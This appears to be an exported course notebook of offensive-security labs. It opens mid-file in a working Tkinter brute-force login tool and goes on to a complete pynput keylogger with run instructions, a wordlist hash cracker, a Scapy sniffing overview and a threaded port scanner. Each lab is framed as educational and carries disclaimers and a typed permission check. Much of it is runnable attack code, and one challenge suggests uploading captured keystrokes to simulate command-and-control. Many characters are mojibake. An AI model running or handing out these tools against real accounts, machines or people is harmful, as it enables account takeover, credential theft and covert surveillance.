        append_log_structured("WARN", "Failed to parse headers JSON", error="invalid_json")
        return {}                                    # on parse failure return empty

# ---------------------------
# Extract CSRF token using regex from a page (optional)
# ---------------------------
def extract_csrf_token(session, page_url, regex_pattern):  # attempts regex extraction
    if not regex_pattern:                             # no regex provided -> skip
        return None
    try:
        resp = session.get(page_url, timeout=(5, 10))  # fetch page with timeouts
        m = re.search(regex_pattern, resp.text)       # apply regex
        if m:
            token = m.group(1) if m.groups() else m.group(0)  # prefer first group
            return token
        return None
    except Exception as e:
        append_log_structured("WARN", "CSRF extraction failed", error=str(e))
        return None

# ---------------------------
# Brute-force worker function (runs in background thread)
# ---------------------------
def brute_force_worker():                             # main worker for attempts
    try:
        # read values from GUI controls
        target = target_var.get().strip()             # target action URL
        login_page = login_page_var.get().strip() or target  # page for CSRF extraction
        method = method_var.get().upper().strip()     # HTTP method POST/GET
        username_field = username_field_var.get().strip()  # form field name for username
        password_field = password_field_var.get().strip()  # form field name for password
        username = username_var.get().strip()         # username value to test
        # read and clean password lines (drop blanks)
        passwords = [p.strip() for p in password_text.get("1.0", tk.END).splitlines() if p.strip()]
        headers_dict = safe_parse_headers(headers_text.get("1.0", tk.END).strip())  # custom headers
        success_kw = success_keyword_var.get().strip()  # success keyword string to search
        csrf_regex = csrf_regex_var.get().strip()       # optional CSRF extraction regex
        try:
            delay = max(0.0, float(delay_var.get()))    # delay between attempts (float)
        except Exception:
            delay = 0.5                                # fallback delay
        try:
            max_attempts_val = int(max_attempts_var.get())  # 0 means unlimited
        except Exception:
            max_attempts_val = 0
        allow_redirects = allow_redirects_var.get()     # boolean for redirects

        # Permission check to avoid accidental misuse
        if permission_var.get().strip() != "I_HAVE_PERMISSION":
            append_log_structured("ERROR", "Missing permission confirmation (I_HAVE_PERMISSION)")
            run_button.configure(state='normal')       # re-enable UI run button
            return

        # validate essential inputs
        if not target:
            append_log_structured("ERROR", "Target URL missing")
            run_button.configure(state='normal')
            return
        if not username:
            append_log_structured("ERROR", "Username missing")
            run_button.configure(state='normal')
            return
        if not passwords:
            append_log_structured("ERROR", "Passwords list empty")
            run_button.configure(state='normal')
            return

        # start logging summary header
        append_log_structured("INFO", "Brute-force started", target=target, username=username,
                              attempts_total=len(passwords), max_attempts=max_attempts_val, method=method)

        # prepare HTTP session with default headers and user-provided headers
        session = requests.Session()                    # persistent session for cookies
        session.headers.update({"User-Agent": "BruteForceEdu/1.0"})  # default UA
        session.headers.update(headers_dict)            # merge custom headers
        session.trust_env = False                       # ignore environment proxies for local tests

        # optionally extract CSRF token once
        csrf_token = None
        if csrf_regex:
            append_log_structured("INFO", "Attempting CSRF extraction", page=login_page)
            csrf_token = extract_csrf_token(session, login_page, csrf_regex)  # may be None
            append_log_structured("INFO", "CSRF extraction result", csrf_token=csrf_token if csrf_token else None)

        # iterate over passwords
        attempt_no = 0
        timeout_tuple = (5, 10)                         # connect and read timeouts
        for pwd in passwords:
            attempt_no += 1                             # increment attempt counter
            # respect configured max attempts if > 0
            if max_attempts_val > 0 and attempt_no > max_attempts_val:
                append_log_structured("INFO", "Reached max attempts, stopping", max_attempts=max_attempts_val)
                break

            # build payload using field names from UI
            payload = {username_field: username, password_field: pwd}
            if csrf_token:
                payload['csrf_token'] = csrf_token

            # send attempt entry to logs (structured)
            append_log_structured("ATTEMPT", "Trying password", attempt_no=attempt_no, password=pwd)

            # attempt request and handle network errors
            try:
                if method == "POST":
                    resp = session.post(target, data=payload, allow_redirects=allow_redirects, timeout=timeout_tuple)
                else:
                    resp = session.get(target, params=payload, allow_redirects=allow_redirects, timeout=timeout_tuple)
            except requests.exceptions.ConnectTimeout:
                append_log_structured("ERROR", "Connect timeout", attempt_no=attempt_no, password=pwd)
                break
            except requests.exceptions.ReadTimeout:
                append_log_structured("ERROR", "Read timeout", attempt_no=attempt_no, password=pwd)
                break
            except Exception as e:
                append_log_structured("ERROR", "Request exception", attempt_no=attempt_no, password=pwd, error=str(e))
                append_log_structured("TRACE", "Exception trace", trace=traceback.format_exc())
                break

            # collect response metadata and small body snippet for privacy/size
            status = getattr(resp, "status_code", None)
            final_url = getattr(resp, "url", None)
            snippet = (resp.text or "")[:400].replace("\n", " ")  # first 400 chars single-line
            append_log_structured("RESPONSE", "Response received", attempt_no=attempt_no,
                                  status=status, final_url=final_url, snippet=snippet)

            # success checks:
            # 1) explicit success keyword in response body
            if success_kw and success_kw in (resp.text or ""):
                append_log_structured("SUCCESS", "Keyword matched", attempt_no=attempt_no, password=pwd)
                show_summary_and_export()                    # show summary and offer CSV export
                run_button.configure(state='normal')         # re-enable run button
                return

            # 2) redirect to /secure (the-internet demo success path)
            if final_url and final_url.rstrip("/").endswith("/secure"):
                append_log_structured("SUCCESS", "Redirected to /secure", attempt_no=attempt_no, password=pwd, final_url=final_url)
                show_summary_and_export()
                run_button.configure(state='normal')
                return

            # 3) loose heuristic when no success keyword provided
            if not success_kw and status == 200 and "invalid" not in (resp.text or "").lower():
                append_log_structured("POSSIBLE", "Heuristic match", attempt_no=attempt_no, password=pwd)
                show_summary_and_export()
                run_button.configure(state='normal')
                return

            # sleep between attempts to respect rate-limiting and politeness
            time.sleep(delay)

        # finished loop without results
        append_log_structured("INFO", "Brute-force completed (no success detected)", total_attempts=attempt_no)
        show_summary_and_export()
        run_button.configure(state='normal')

    except Exception as outer:
        append_log_structured("FATAL", "Worker exception", error=str(outer))
        append_log_structured("TRACE", "Worker trace", trace=traceback.format_exc())
        run_button.configure(state='normal')

# ---------------------------
# Summary display and CSV export
# ---------------------------
def show_summary_and_export():
    """Build a human-friendly summary from attempts_records and offer CSV export."""
    total = len(attempts_records)                       # number of stored structured entries
    # count successes
    successes = [r for r in attempts_records if r.get("level") in ("SUCCESS",)]
    # create summary text
    summary_lines = [
        f"Summary generated at: {now_ts()}",
        f"Total structured records: {total}",
        f"Success count: {len(successes)}",
    ]
    # if any successes provide details
    if successes:
        for s in successes:
            summary_lines.append(f"  - Success attempt {s.get('attempt_no')} password={s.get('password')}")
    else:
        summary_lines.append("No successful attempts recorded.")

    # display summary in a popup (scrollable)
    messagebox.showinfo("Run Summary", "\n".join(summary_lines))

    # ask user to export CSV
    if total > 0:
        if messagebox.askyesno("Export CSV", "Export attempt records to CSV file?"):
            fpath = filedialog.asksaveasfilename(defaultextension=".csv", filetypes=[("CSV files", "*.csv")])
            if fpath:
                try:
                    # write CSV with consistent columns
                    keys = ["ts", "level", "attempt_no", "password", "status", "final_url", "message"]
                    with open(fpath, "w", newline='', encoding='utf-8') as f:
                        writer = csv.writer(f)
                        writer.writerow(keys)
                        for rec in attempts_records:
                            writer.writerow([
                                rec.get("ts", ""),
                                rec.get("level", ""),
                                rec.get("attempt_no", ""),
                                rec.get("password", ""),
                                rec.get("status", rec.get("status", "")),
                                rec.get("final_url", rec.get("final_url", "")),
                                rec.get("message", "")
                            ])
                    append_log_structured("INFO", "Exported CSV", path=fpath)
                    messagebox.showinfo("Exported", f"CSV exported to: {fpath}")
                except Exception as e:
                    append_log_structured("ERROR", "CSV export failed", error=str(e))
                    messagebox.showerror("Export failed", str(e))

# ---------------------------
# GUI Construction (Tkinter)
# ---------------------------

root = tk.Tk()                                        # create main application window
root.title("Brute-Force Login Tool ‚Äî Structured Output (Educational)")  # window title

# left and right column frames
left_frame = tk.Frame(root)                          # left frame for configuration
left_frame.pack(side=tk.LEFT, padx=8, pady=8, fill=tk.Y)  # pack left

right_frame = tk.Frame(root)                         # right frame for passwords & headers
right_frame.pack(side=tk.RIGHT, padx=8, pady=8, fill=tk.Y)  # pack right

# --- Left column fields ---
tk.Label(left_frame, text="Target action URL (use /authenticate for the-internet demo)").pack(anchor='w')
target_var = tk.StringVar(value="https://the-internet.herokuapp.com/authenticate")  # default correct endpoint
tk.Entry(left_frame, textvariable=target_var, width=60).pack(anchor='w')

tk.Label(left_frame, text="Login page URL (for CSRF extraction, optional)").pack(anchor='w')
login_page_var = tk.StringVar(value="https://the-internet.herokuapp.com/login")  # demo login page
tk.Entry(left_frame, textvariable=login_page_var, width=60).pack(anchor='w')

tk.Label(left_frame, text="HTTP Method").pack(anchor='w')
method_var = tk.StringVar(value="POST")
tk.OptionMenu(left_frame, method_var, "POST", "GET").pack(anchor='w')

tk.Label(left_frame, text="Username field name (form)").pack(anchor='w')
username_field_var = tk.StringVar(value="username")
tk.Entry(left_frame, textvariable=username_field_var).pack(anchor='w')

tk.Label(left_frame, text="Password field name (form)").pack(anchor='w')
password_field_var = tk.StringVar(value="password")
tk.Entry(left_frame, textvariable=password_field_var).pack(anchor='w')

tk.Label(left_frame, text="Username to test").pack(anchor='w')
username_var = tk.StringVar(value="tomsmith")        # demo account
tk.Entry(left_frame, textvariable=username_var).pack(anchor='w')

tk.Label(left_frame, text="Success keyword (exact match)").pack(anchor='w')
success_keyword_var = tk.StringVar(value="You logged into a secure area!")
tk.Entry(left_frame, textvariable=success_keyword_var, width=60).pack(anchor='w')

tk.Label(left_frame, text="CSRF regex (optional)").pack(anchor='w')
csrf_regex_var = tk.StringVar(value="")              # no default
tk.Entry(left_frame, textvariable=csrf_regex_var, width=60).pack(anchor='w')

tk.Label(left_frame, text="Delay between attempts (seconds)").pack(anchor='w')
delay_var = tk.DoubleVar(value=0.5)                  # default half-second
tk.Entry(left_frame, textvariable=delay_var, width=10).pack(anchor='w')

tk.Label(left_frame, text="Max attempts (0 = all)").pack(anchor='w')
max_attempts_var = tk.IntVar(value=0)                # default unlimited
tk.Entry(left_frame, textvariable=max_attempts_var, width=10).pack(anchor='w')

allow_redirects_var = tk.BooleanVar(value=True)      # default True (follow redirects)
tk.Checkbutton(left_frame, text="Allow redirects (recommended)", variable=allow_redirects_var).pack(anchor='w')

tk.Label(left_frame, text="Type I_HAVE_PERMISSION to enable run").pack(anchor='w')
permission_var = tk.StringVar(value="")              # must type I_HAVE_PERMISSION to proceed
tk.Entry(left_frame, textvariable=permission_var, width=30, fg='red').pack(anchor='w')

# --- Right column fields (headers + passwords) ---
tk.Label(right_frame, text="Custom Headers (JSON, optional)").pack(anchor='w')
headers_text = scrolledtext.ScrolledText(right_frame, width=50, height=5)
headers_text.insert(tk.END, '{"User-Agent": "BruteForceEdu/1.0"}')  # sensible default
headers_text.pack(anchor='w')

tk.Label(right_frame, text="Passwords (one per line) ‚Äî include SuperSecretPassword! for demo").pack(anchor='w')
password_text = scrolledtext.ScrolledText(right_frame, width=50, height=18)
password_text.insert(tk.END, "wrongpass\n123456\nSuperSecretPassword!\nletmein")  # default demo list
password_text.pack(anchor='w')

# --- Log area (bottom) ---
tk.Label(root, text="Structured logs (JSON lines)").pack(anchor='w', padx=8)
log_area = scrolledtext.ScrolledText(root, width=120, height=18, state='disabled')  # read-only by default
log_area.pack(padx=8, pady=(0,8))

# --- Control area: Run button and record storage ---
attempts_records = []                                # list to store structured attempt entries for summary/export

def on_run_clicked():                                # click handler for run button
    run_button.configure(state='disabled')           # disable to prevent double-run
    append_log_structured("INFO", "Run button clicked - starting worker")  # log click
    # start worker in background thread to keep GUI responsive
    threading.Thread(target=brute_force_worker, daemon=True).start()

run_button = tk.Button(root, text="üöÄ Run Brute-Force (Educational Only)", bg='red', fg='white', command=on_run_clicked)
run_button.pack(pady=(0,10))

# start the Tk main event loop (blocking)
root.mainloop()

```



---

### üîê Brute-Force Login Simulator (Educational Use Only)

**üß† Description:**
This interactive Python tool demonstrates how a brute-force attack works by automatically submitting a list of passwords to a login form. It is designed **only for educational purposes** on legal test targets like:

* ‚úÖ [`https://the-internet.herokuapp.com/login`](https://the-internet.herokuapp.com/login) (demo site)
* ‚úÖ Local web apps (e.g., DVWA, Juice Shop, custom apps)

This helps students understand:

* How login forms work under the hood
* How attackers attempt brute-force logins
* How rate-limiting, CAPTCHA, and account lockouts protect against such attacks

---

### ‚ñ∂Ô∏è How to Run:

1. **Ensure you're on Google Colab.**
   No installation is needed ‚Äî all libraries are built-in.

2. **Set the required inputs:**

   * üîó **Target URL:** The full login POST endpoint (e.g., `https://the-internet.herokuapp.com/login`)
   * üë§ **Username:** A known or test username (e.g., `tomsmith`)
   * üîë **Passwords:** A list of password guesses, one per line (Working Password: SuperSecretPassword!)
   * üìã **Form field names:** Usually `username` and `password`
   * ‚úÖ **Success keyword:** Phrase that confirms login success (e.g., `You logged into a secure area!`)
   * ‚è±Ô∏è **Delay:** Time to wait between each request

3. **Click** üöÄ **"Start Brute Force"**
   The tool will try each password and stop once it finds a match.

4. To interrupt mid-way, click üõë **"Stop"**.

---

### ‚ö†Ô∏è Warning:

Use this tool **only on legal, educational test targets**.
You must **never test** real websites without **explicit written permission**.
Unauthorized use may be illegal and unethical.

---


# **What the code does.**



1. ü™ü **Open window** ‚Äî the program shows a small window where you type settings (target site, username, passwords).
2. ‚úÖ **Permission check** ‚Äî you must type `I_HAVE_PERMISSION` or the program won‚Äôt run.
3. ‚ñ∂Ô∏è **Press Run** ‚Äî when you click the Run button it starts working in the background so the window stays responsive.
4. üßæ **Read your inputs** ‚Äî the worker reads the target URL, username, list of passwords, headers, method (POST/GET), delay, max attempts, CSRF regex, and success keyword.
5. üìù **Log start** ‚Äî it writes a structured ‚ÄúI started‚Äù message into the log area so you can see the run began.
6. üîó **Open a session** ‚Äî it makes a `requests` session to keep cookies and headers between tries.
7. üîç **Try CSRF token (optional)** ‚Äî if you gave a regex, it fetches the login page and tries to find a CSRF token to include in the form.
8. üîÅ **Loop through passwords** ‚Äî it goes line-by-line through your password list. For each password it does:

   * a. üß© **Build form data** (username + this password; add CSRF token if found).
   * b. üì£ **Log attempt** ‚Äî writes ‚ÄúTrying this password‚Äù to the structured log.
   * c. üì® **Send request** ‚Äî sends a real HTTP POST or GET to the target.
   * d. üì¨ **Log response** ‚Äî records status code, URL, and a small text snippet.
9. üü¢ **Check success (three ways)** ‚Äî if any of these happen it stops and reports success:

   * üîé Keyword found in the page (if you set one).
   * üîÅ Redirected to `/secure` (demo-site pattern).
   * ü§î No keyword set: server returned `200` and response doesn‚Äôt contain ‚Äúinvalid‚Äù (loose guess).
10. üõë **On success** ‚Äî it logs success, shows a short summary, and asks if you want to export attempt records to CSV.
11. ‚ö†Ô∏è **On network errors** ‚Äî if a timeout or request error happens it logs the error and usually stops the run.
12. ‚è≥ **Wait between tries** ‚Äî it sleeps the delay you entered (politeness/rate-limit).
13. üßØ **Max attempts honored** ‚Äî if you set a maximum number, it stops when reached.
14. ‚úÖ **Finish with no success** ‚Äî if none worked it logs ‚Äúcompleted ‚Äî no success‚Äù and offers export.
15. üíæ **CSV export** ‚Äî you can save structured attempt logs (timestamps, attempt number, password text, status, URL, message) to a CSV file.
16. üõ°Ô∏è **Safety note** ‚Äî the program logs plaintext passwords by default, so only use it on systems you‚Äôre allowed to test (the `I_HAVE_PERMISSION` step is required).




---

## üß† Lab 3: Keyloggers with `pynput` or `keyboard` Module

### üéØ Objectives:

* Understand how keyloggers work
* Build a **basic keystroke logger** in Python
* Log captured keys to a local file
* Discuss **ethical boundaries** and **defense mechanisms** used by OS and antivirus tools

---

### üîç What is a Keylogger?

A **keylogger** is a tool that records the keys pressed on a keyboard, often without the user's knowledge. Keyloggers can be used for:

| ‚úÖ **Ethical Use**                              | ‚ùå **Unethical / Malicious Use**       |
| ---------------------------------------------- | ------------------------------------- |
| Parental control                               | Stealing passwords and sensitive data |
| Employee monitoring (with consent)             | Espionage or surveillance             |
| Accessibility & usability testing              | Identity theft                        |
| Debugging / Human-Computer Interaction studies | Banking fraud                         |

> üîí **Disclaimer**: Unauthorized use of keyloggers is **illegal and unethical**. This lab is for educational purposes only and must be used in controlled environments.

---

### üõ†Ô∏è How Keyloggers Work

Keyloggers hook into the **operating system‚Äôs keyboard event loop**, listening for key press or release events in real-time.

Two popular Python libraries:

* `pynput`: Cross-platform, uses low-level hooks (detectable by antivirus)
* `keyboard`: Lightweight but **Windows-only**

---

### üíª How to Build a Simple Keylogger

The core steps:

1. Import the keyboard listening module
2. Create an event handler to capture and store pressed keys
3. Save the keys to a text file
4. Run the logger in the background

> üóÉÔ∏è Note: Such scripts are often flagged by antivirus tools because of their potential abuse.

---

### üîê Security Defenses Against Keyloggers

Modern systems use several methods to detect or block keyloggers:

| üî∞ Defense Technique              | üß† Description                                                    |
| --------------------------------- | ----------------------------------------------------------------- |
| **Antivirus Signatures**          | Known keylogger patterns are flagged                              |
| **Heuristic Analysis**            | Detects suspicious behavior like keyboard event hooks             |
| **UAC and Admin Rights Checks**   | Prevents unauthorized background processes                        |
| **Browser Sandboxing**            | Blocks external scripts from capturing keystrokes in web apps     |
| **Hardware Encryption Keyboards** | Bypass software-level interception                                |
| **System Hooks Monitoring (EDR)** | Detects use of libraries like `pynput`, `keyboard`, or `win32api` |

---

### üß† Reflection Questions:

1. Can keyloggers be implemented remotely? How?
2. What indicators might suggest a keylogger is running?
3. How would you detect unauthorized keylogging on your system?
4. How can a keylogger be used ethically for usability testing?

---



---

## üß™ üîê Python Keylogger using `pynput`

### ‚úÖ Install the required package first:

```bash
pip install pynput
```

---

### üíª Final Code: `keylogger.py`

```python
# ---------------------------------------------
# üîê Simple Keylogger using pynput (Educational)
# ---------------------------------------------

# Import required modules from pynput
from pynput import keyboard  # Used to listen to keyboard events

# Create/open a file to store the key logs
log_file = "key_log.txt"  # File where we will save the keystrokes

# -----------------------
# üì• Function to log keys
# -----------------------
def on_press(key):
    """
    This function is called whenever a key is pressed.
    It receives the key as input and writes it to a file.
    """
    try:
        # Try to get the alphanumeric character from the key
        pressed_key = key.char  
    except AttributeError:
        # Special keys like shift, ctrl, enter, etc. are stored as string names
        pressed_key = str(key)
    
    # Write the key to file in append mode
    with open(log_file, "a") as f:
        f.write(pressed_key + "\n")  # Save each keypress on a new line

# ----------------------------
# üõë Optional: Stop on Escape
# ----------------------------
def on_release(key):
    """
    Optional: This function can stop the listener.
    Here we stop if user presses the Escape key.
    """
    if key == keyboard.Key.esc:
        # Stop the listener
        print("Keylogger stopped by user.")
        return False

# ----------------------------
# üéß Start Listening to Keys
# ----------------------------
print("Keylogger started... Press ESC to stop.")

# Create a listener that monitors keyboard press and release
with keyboard.Listener(on_press=on_press, on_release=on_release) as listener:
    listener.join()  # This keeps the listener running in the background
```

---

### üì¶ Output:

* All keys pressed are logged in:

  ```
  key_log.txt
  ```

Example content:

```
a
b
Key.space
c
Key.enter
```

---

### üö® Disclaimer and Safety:

* **Only use on your own machine** or in a sandboxed virtual machine.
* Many antivirus programs may flag or block this script.
* If you package this as `.exe`, it may be auto-deleted.
* For ethical monitoring, always notify the user.

---

### üß† Extra Challenge:

* Add timestamps next to each key
* Email or upload logs periodically (simulate C2 communication)
* Modify it to record only when a specific app (e.g., browser) is active
* Build a simple GUI-based version




---

## ‚úÖ **Step-by-Step: How to Test Your Keylogger (Ethical Use Only)**

### ‚ö†Ô∏è Reminder:

> üõë **Do NOT use this on anyone else‚Äôs computer** or without their explicit written permission.
> ‚úÖ This is for **educational/self-testing** only.

---

### üîß **1. Environment Setup**

#### ‚úÖ Install Python and Required Library

If not already done:

```bash
pip install pynput
```

#### üìÅ Save the Script

* Create a new Python file:
  `keylogger.py`

* Paste the finalized code (from earlier) into it.

---

### ‚ñ∂Ô∏è **2. Run the Script**

#### üìå On Windows/macOS/Linux terminal:

```bash
python keylogger.py
```

* You will see:

  ```
  Keylogger started... Press ESC to stop.
  ```

* Now keep the terminal open and start typing **in any other window** (e.g., Notepad, browser, etc.).

---

### üß™ **3. Perform a Test**

1. Open **Notepad or any text editor** side by side.
2. Type:

   ```
   Hello123
   [Space]
   Welcome!
   [Enter]
   ```
3. Go back to the terminal and **press ESC** to stop the logger.

---

### üìÑ **4. Check the Output Log**

* Open the file:

  ```bash
  key_log.txt
  ```

* You should see something like:

  ```
  H
  e
  l
  l
  o
  1
  2
  3
  Key.space
  W
  e
  l
  c
  o
  m
  e
  !
  Key.enter
  ```

---

### üõ°Ô∏è **5. Defensive Testing (Bonus)**

> Check how your **Operating System and Antivirus** respond.

* Windows Defender or 3rd-party antivirus might:

  * Block the script
  * Quarantine the `.exe` if converted
  * Show an alert about suspicious behavior
* That‚Äôs how many systems detect **keyloggers as malware**.

‚úÖ **This validates how OS/AV defend against keylogging attacks.**

---

### üßπ **6. Clean Up**

After testing:

```bash
del key_log.txt
```

Or just delete the file manually.

---




---

# üîê 4. Hash Cracking with `hashlib` + Wordlists

---

## üìò What is Hash Cracking?

Hash cracking is the process of **reversing cryptographic hash functions** by **guessing the original input** (like a password) and checking if its hash matches the known hash value.

---

## üîÅ Why is it Possible to Crack Hashes?

* Hashing is **one-way**: You can't reverse a hash mathematically.
* But attackers can **guess inputs**, hash them, and **compare** to the known hash.
* This process is called **brute-force** or **dictionary attack** (when using wordlists like RockYou).

---

## üß™ Common Hash Functions

| Hash Function | Digest Length | Used In                          |
| ------------- | ------------- | -------------------------------- |
| MD5           | 128-bit       | Legacy systems, fast but weak    |
| SHA-1         | 160-bit       | Old certificates, now deprecated |
| SHA-256       | 256-bit       | Modern apps, Bitcoin, etc.       |

---

## üß∞ Python's `hashlib` Module

Python's built-in `hashlib` allows us to:

* Compute hashes (MD5, SHA1, SHA256, etc.)
* Compare hashes with known values
* Run custom brute-force or dictionary attacks

```python
import hashlib

hashlib.md5("password".encode()).hexdigest()
# Output: "5f4dcc3b5aa765d61d8327deb882cf99"
```

---

## üß™ Example Workflow

Imagine you have this hash:

```
5f4dcc3b5aa765d61d8327deb882cf99
```

You know it's **MD5**, and want to find the original password. You:

1. Load a wordlist (like `rockyou.txt`)
2. For each word:

   * Hash it using MD5
   * Compare with the target hash
3. If matched ‚Üí cracked!

---

## üß† Why RockYou Wordlist?

* Originally leaked from a social app called **RockYou**
* Contains **millions of real-world passwords**
* One of the **most used dictionaries** for password cracking

---

## üîê Ethical & Legal Use

‚úÖ **Allowed When**:

* On your own systems
* For learning and research
* For penetration testing (with permission)

‚ùå **Illegal When**:

* Used on real users/systems without consent
* Part of unauthorized hacking activities

---

## üõ°Ô∏è Defenses Against Hash Cracking

| Defense Technique     | Description                              |
| --------------------- | ---------------------------------------- |
| **Salting**           | Add a random string before hashing       |
| **Key Stretching**    | Slow down hashing (e.g., bcrypt, PBKDF2) |
| **Password Policies** | Enforce strong, unique passwords         |
| **Rate Limiting**     | Prevent too many guesses per second      |

---



In [None]:
# ================================================
# üîê Hash Cracker with Widgets (Educational Only)
# ================================================
# This app allows students to experiment with cracking MD5/SHA256 hashes
# using a wordlist. It supports selecting the algorithm and outputs results
# interactively. Intended for authorized lab/testing only.
# ================================================

# üì¶ Import required modules
import hashlib                       # For MD5, SHA1, SHA256 hashing
import ipywidgets as widgets        # For interactive inputs in Jupyter/Colab
from IPython.display import display # For displaying widgets and outputs
import time                         # To measure how long cracking takes

# üéØ Input widget: hash value to crack
hash_input = widgets.Text(
    value='5f4dcc3b5aa765d61d8327deb882cf99',  # MD5 of 'password'
    description='Hash to Crack:',
    placeholder='Enter hash here',
    style={'description_width': 'initial'},
    layout=widgets.Layout(width='70%')
)

# üîÄ Dropdown: hash algorithm selection
algo_dropdown = widgets.Dropdown(
    options=['md5', 'sha256'],
    value='md5',
    description='Hash Algorithm:',
    style={'description_width': 'initial'}
)

# üìÑ Password wordlist textarea (one word per line)
wordlist_input = widgets.Textarea(
    value='123456\npassword\nletmein\nqwerty\nadmin\nwelcome\ntrustno1',
    placeholder='One word per line',
    description='Wordlist:',
    layout=widgets.Layout(width='70%', height='150px'),
    style={'description_width': 'initial'}
)

# üïí Output widget for results
output = widgets.Output(layout={'border': '1px solid black', 'height': '200px'})

# ‚ñ∂Ô∏è Button to start cracking
crack_button = widgets.Button(
    description='üöÄ Crack Hash',
    button_style='danger',
    tooltip='Start hash cracking with the provided wordlist'
)

# üß† Cracking logic
def crack_hash(b):
    with output:
        output.clear_output()  # Clear previous results

        target_hash = hash_input.value.strip().lower()   # Get input hash
        algo = algo_dropdown.value                       # Selected algorithm
        words = wordlist_input.value.strip().splitlines()  # List of words

        print(f"üîç Starting hash cracking using {algo.upper()}...")
        start_time = time.time()

        found = False
        for idx, word in enumerate(words, 1):
            word = word.strip()  # Clean word

            # Skip empty lines
            if not word:
                continue

            # Encode and hash based on selected algorithm
            if algo == 'md5':
                hashed = hashlib.md5(word.encode()).hexdigest()
            elif algo == 'sha256':
                hashed = hashlib.sha256(word.encode()).hexdigest()
            else:
                print("‚ùå Unsupported algorithm")
                return

            print(f"[{idx}] Trying: {word} ‚Üí {hashed}")

            # Compare with target hash
            if hashed == target_hash:
                elapsed = time.time() - start_time
                print(f"\n‚úÖ MATCH FOUND!")
                print(f"üîë Plaintext: {word}")
                print(f"‚è±Ô∏è Time taken: {elapsed:.2f} seconds")
                found = True
                break

        if not found:
            elapsed = time.time() - start_time
            print("\n‚ùå No match found in provided wordlist.")
            print(f"‚è±Ô∏è Time taken: {elapsed:.2f} seconds")

# üîÑ Bind the button to the function
crack_button.on_click(crack_hash)

# üì¶ Display everything
display(widgets.VBox([
    hash_input,
    algo_dropdown,
    wordlist_input,
    crack_button,
    output
]))


VBox(children=(Text(value='5f4dcc3b5aa765d61d8327deb882cf99', description='Hash to Crack:', layout=Layout(widt‚Ä¶


---

## üìö **5. Network Packet Sniffing with Scapy** üîçüß™

---

### üß† What is Packet Sniffing?

Packet sniffing is the process of **capturing** and **analyzing raw network traffic** as it moves across a network. It allows security professionals and attackers alike to inspect the data being sent between devices.

Think of it as placing a microphone on a network cable to "listen" to everything that passes through‚Äîlike login credentials, URLs, file downloads, and even chat messages‚Äî**if they‚Äôre unencrypted**.

---

### üõ†Ô∏è What is Scapy?

`Scapy` is a powerful Python library used for:

* Capturing (sniffing) packets üì•
* Building and sending custom packets üì§
* Analyzing protocols and fields üîé
* Performing network scanning, fingerprinting, and attacks üß™

It gives you full control over packet-level behavior and is widely used in **network security testing**, **forensics**, and **pentesting**.

---

### üéØ Why Learn Packet Sniffing?

Because it's used in:

| Use Case                  | Purpose                                    |
| ------------------------- | ------------------------------------------ |
| ‚úÖ **Ethical hacking**     | Find vulnerabilities in unsecured networks |
| ‚úÖ **Intrusion detection** | Monitor suspicious behavior                |
| ‚úÖ **Incident response**   | Analyze captured traffic logs              |
| ‚ùå **Malicious spying**    | Capture passwords or session cookies       |

---

### üî¨ What Can Be Captured?

| Protocol | Capturable Data                           |
| -------- | ----------------------------------------- |
| HTTP     | URLs, usernames, passwords (plaintext) üîì |
| FTP      | Commands, files, login credentials üîì     |
| HTTPS    | Almost nothing (encrypted) üîí             |
| DNS      | Domain queries and responses              |

> ‚ö†Ô∏è **Always test only on authorized or local test environments. Never sniff traffic on public or unauthorized networks.**

---

### üß™ Lab Task: Sniff HTTP Login Credentials

In the lab:

* You‚Äôll use Scapy to capture packets
* Filter for HTTP traffic (`port 80`)
* Look for patterns like `username=` or `password=`

---

### üîí Why HTTPS Prevents Packet Sniffing

HTTPS (HyperText Transfer Protocol Secure) **encrypts** data using TLS before it's sent. This means:

* Even if a packet sniffer sees the packet,
* The **payload (username, password, etc.)** is **scrambled** (encrypted) using cryptographic keys.
* **No attacker** (unless they control the certificate or use a man-in-the-middle proxy) can read it.

| Without HTTPS       | With HTTPS            |
| ------------------- | --------------------- |
| Passwords visible   | Encrypted üîí          |
| Session IDs exposed | Secured üîí            |
| URLs in plain text  | URLs mostly hidden üîí |

---

### ‚úÖ Summary

| Concept         | Key Point                                   |
| --------------- | ------------------------------------------- |
| Packet Sniffing | Capturing and analyzing network traffic     |
| Tool Used       | `scapy` in Python                           |
| Ethical Usage   | Only on test/local networks with permission |
| HTTPS Advantage | Prevents sniffing by encrypting data        |

---




---

### ‚úÖ **Port Scanner**

```python
# ===============================
# üîç Port Scanner with Simple UI
# ===============================
# This script scans a target host to identify open ports.
# It provides a simple text-based interface for user input.
# ===============================

import socket         # Used for creating socket connections
import threading      # To scan multiple ports in parallel
from datetime import datetime   # For timestamping
import sys            # For exiting the program

# -------------------------------
# Function to scan a single port
# -------------------------------
def scan_port(target_ip, port):
    try:
        # Create a socket object: IPv4 + TCP
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(1)  # Set timeout to 1 second per port

        # Try to connect to the port
        result = sock.connect_ex((target_ip, port))

        if result == 0:
            print(f"‚úÖ Port {port} is OPEN")
        # else:
        #     print(f"‚ùå Port {port} is closed")  # Uncomment for verbose

        sock.close()
    except Exception as e:
        print(f"‚ö†Ô∏è Error scanning port {port}: {e}")

# -------------------------------
# Main function
# -------------------------------
def main():
    print("\n==============================")
    print("üîç Simple Python Port Scanner")
    print("==============================")

    # Get user input for target
    target = input("üìå Enter the IP address or domain to scan (e.g., 127.0.0.1 or scanme.nmap.org): ").strip()

    # Resolve domain name to IP if needed
    try:
        target_ip = socket.gethostbyname(target)
    except socket.gaierror:
        print("‚ùå Invalid host. Please check the address.")
        sys.exit()

    print(f"\nüïê Scan started at: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}")
    print(f"üñ•Ô∏è Target IP: {target_ip}\n")

    # Get port range
    try:
        start_port = int(input("üî¢ Start port (e.g., 1): "))
        end_port = int(input("üî¢ End port (e.g., 100): "))

        if start_port < 1 or end_port > 65535 or start_port > end_port:
            raise ValueError
    except ValueError:
        print("‚ùå Invalid port range. Ports must be between 1 and 65535.")
        sys.exit()

    print(f"\nüîÑ Scanning ports {start_port} to {end_port}...\n")

    # Loop over port range and scan each using threads
    threads = []
    for port in range(start_port, end_port + 1):
        t = threading.Thread(target=scan_port, args=(target_ip, port))
        threads.append(t)
        t.start()

    # Wait for all threads to complete
    for t in threads:
        t.join()

    print(f"\n‚úÖ Scan completed at: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n")

# -------------------------------
# Run the main function
# -------------------------------
if __name__ == "__main__":
    main()
```

---

